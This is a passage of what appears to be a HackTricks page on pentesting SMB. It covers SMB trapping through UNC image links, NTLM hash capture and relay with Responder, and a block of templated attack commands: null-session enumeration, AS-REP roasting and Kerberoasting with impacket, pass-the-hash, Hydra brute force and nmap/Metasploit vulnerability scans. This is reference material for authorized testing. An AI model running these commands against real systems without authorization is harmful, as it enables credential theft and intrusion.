    679 Some Windows applications that use URLMon or related URL handlers may attempt integrated authentication when processing a UNC resource such as `<img src="file://10.10.10.10/path/image.jpg">`. Modern browser zone policy and application-specific restrictions can prevent or prompt for this behavior, so verify it against the exact client in scope.
    680 
    681 This happens with the functions:
    682 
    683 - URLDownloadToFile
    684 - URLDownloadToCache
    685 - URLOpenStream
    686 - URLOpenBlockingStream
    687 
    688 Applications may call functions such as:
    689 
    690 ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28358%29.png)
    691 
    692 ### SMBTrap using MitMf
    693 
    694 ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28892%29.png)
    695 
    696 ## NTLM Theft
    697 
    698 Similar to SMB trapping, planting crafted shortcut, document, or URL-bearing files on a target system can **elicit** an SMB authentication attempt when a user or vulnerable parser processes them. A tool such as Responder can capture the NTLMv2 challenge-response, which may then be tested offline or relayed when the relevant protections and account restrictions permit it.
    699 
    700 [See: ntlm_theft](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds#ntlm_theft)
    701 
    702 ## HackTricks Automatic Commands
    703 
    704 ```text
    705 Protocol_Name: SMB    #Protocol Abbreviation if there is one.
    706 Port_Number:  137,138,139     #Comma separated if there is more than one.
    707 Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out
    708 
    709 Entry_1:
    710   Name: Notes
    711   Description: Notes for SMB
    712   Note: |
    713     While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
    714 
    715     #These are the commands I run in order every time I see an open SMB port
    716 
    717     With No Creds
    718     nbtscan {IP}
    719     smbmap -H {IP}
    720     smbmap -H {IP} -u null -p null
    721     smbmap -H {IP} -u guest
    722     smbclient -N -L //{IP}
    723     smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    724     rpcclient {IP}
    725     rpcclient -U "" {IP}
    726     crackmapexec smb {IP}
    727     crackmapexec smb {IP} --pass-pol -u "" -p ""
    728     crackmapexec smb {IP} --pass-pol -u "guest" -p ""
    729     GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    730     GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    731     GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    732     getArch.py -target {IP}
    733 
    734     With Creds
    735     smbmap -H {IP} -u {Username} -p {Password}
    736     smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
    737     smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
    738     crackmapexec smb {IP} -u {Username} -p {Password} --shares
    739     GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    740     GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    741     GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
    742 
    743     https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
    744 
    745 Entry_2:
    746   Name: Enum4Linux
    747   Description: General SMB Scan
    748   Command: enum4linux -a {IP}
    749 
    750 Entry_3:
    751   Name: Nmap SMB Scan 1
    752   Description: SMB Vuln Scan With Nmap
    753   Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
    754 
    755 Entry_4:
    756   Name: Nmap Smb Scan 2
    757   Description: SMB Vuln Scan With Nmap (Less Specific)
    758   Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
    759 
    760 Entry_5:
    761   Name: Hydra Brute Force
    762   Description: Need User
    763   Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
    764 
    765 Entry_6:
    766   Name: SMB/SMB2 139/445 consolesless mfs enumeration
    767   Description: SMB/SMB2 139/445  enumeration without the need to run msfconsole
    768   Note: sourced from https://github.com/carlospolop/legion
    769   Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
    770 
    771 ```
    772 
    773 ## References
    774 
    775 - [1] [0xdf - HTB Abducted](https://0xdf.gitlab.io/2026/07/07/htb-abducted.html)
    776 - [2] [Samba `smb.conf` man page](https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html)
    777 - [3] [NVD - CVE-2026-4480](https://nvd.nist.gov/vuln/detail/CVE-2026-4480)
    778 - [4] [Rclone `obscure` documentation](https://rclone.org/commands/rclone_obscure/)
    779 - [5] [NetExec (CME) wiki – Kerberos usage](https://www.netexec.wiki/)
    780 - [6] [ShareHound (collector)](https://github.com/p0dalirius/sharehound)
    781 - [7] [ShareQL (DSL)](https://github.com/p0dalirius/shareql)
    782 - [8] [Pentesting Kerberos (88) – client setup and troubleshooting](/hacktricks/network-services-pentesting/pentesting-kerberos-88/overview)
    783 - [9] [Microsoft SMB2 transport specification](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1dfacde4-b5c7-4494-8a14-a09d3ab4cc83)
    784 - [10] [SMB file sharing overview for Windows and Windows Server](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview)
    785 - [11] [Microsoft overview of SMB signing and relay protection](https://learn.microsoft.com/en-us/windows-server/storage/file-server/smb-signing-overview)